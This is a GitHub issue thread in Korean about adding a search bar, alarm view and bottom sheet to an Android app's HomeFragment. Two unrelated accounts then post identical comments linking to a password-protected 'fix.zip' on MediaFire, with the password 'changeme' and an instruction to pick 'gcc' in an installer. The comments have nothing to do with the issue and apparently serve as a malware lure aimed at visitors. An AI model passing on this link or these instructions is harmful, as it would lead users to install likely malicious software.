### ISSUE TITLE
HomeFragment UI 작업

### ISSUE THREAD

**Issue by IDKOS1** [Promise-of-Blood/SeeAt#10]
## 🫠 설명

> HomeFragment에 UI 화면 추가

## ✨ 작업 내용

- [x] 검색 창 추가
- [x] 알람 창 추가
- [x] 바텀 시트 추가

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Searchanik** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
